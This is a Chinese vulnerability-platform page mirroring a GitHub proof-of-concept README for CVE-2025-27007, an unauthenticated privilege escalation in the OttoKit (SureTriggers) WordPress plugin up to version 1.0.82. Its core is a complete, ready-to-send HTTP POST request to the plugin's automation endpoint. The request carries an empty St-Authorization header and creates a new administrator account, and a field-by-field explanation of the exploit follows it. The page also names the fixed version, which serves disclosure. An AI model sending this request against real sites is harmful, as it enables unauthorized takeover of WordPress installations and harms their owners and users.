漏洞平台

POC详情： 2d121ccf74947defb13497cc4d1119c2d80cb2df

来源

https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit

关联漏洞

标题： WordPress plugin SureTriggers 安全漏洞 (CVE-2025-27007)
描述：WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin SureTriggers 1.0.82及之前版本存在安全漏洞，该漏洞源于权限分配不当，可能导致权限提升。

描述

exploiting CVE-2025-27007, a critical unauthenticated privilege escalation vulnerability in the OttoKit (formerly SureTriggers) WordPress plugin

介绍

# CVE-2025-27007: OttoKit (SureTriggers) Privilege Escalation Vulnerability 

Exploitation of CVE-2025-27007, a critical vulnerability in unauthorized privilege escalation in the OttoKit plugin (formerly known as SureTriggers) for WordPress. This repository outlines how an attacker can create an administrator account on a vulnerable WordPress site.

### Affected Versions
- All versions of OttoKit (SureTriggers) **≤ 1.0.82**.
- Fixed in version **1.0.83**.

### Conditions for Exploitation
The vulnerability can be exploited under the following circumstances:
1. OttoKit must be installed and activated on the target WordPress site.
2. The plugin **uninitialized** (e.g., no API key or "secret_key" is set in the database).
3. The target site displays the REST API endpoint '/wp-json/sure-triggers/v1/automation/action'.

---

### HTTP Request
The following request targets the `/wp-json/sure-triggers/v1/automation/action` endpoint to create an administrator account:

```http
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization: 
Content-Length: [length]

selected_options[user_name]=new_admin&selected_options[user_email]=attacker@example.com&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists

```
------------------------------------------------------------------

## Explanation of Request
* Endpoint: POST /wp-json/sure-triggers/v1/automation/action

* St-Authorization:  (empty): Bypasses authentication when the plugin is unconfigured.

* selected_options[user_name]: Username for the new account (e.g., new_admin).

* selected_options[user_email]: Email for the new account (e.g., attacker@example.com).

* selected_options[password]: Password for the new account (e.g., StrongP@ssw0rd123).

* selected_options[role]: Set to administrator to grant full privileges.

*  type_event: Set to create_user_if_not_exists to trigger user creation

文件快照


 [4.0K]  /data/pocs/2d121ccf74947defb13497cc4d1119c2d80cb2df
└── [2.0K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。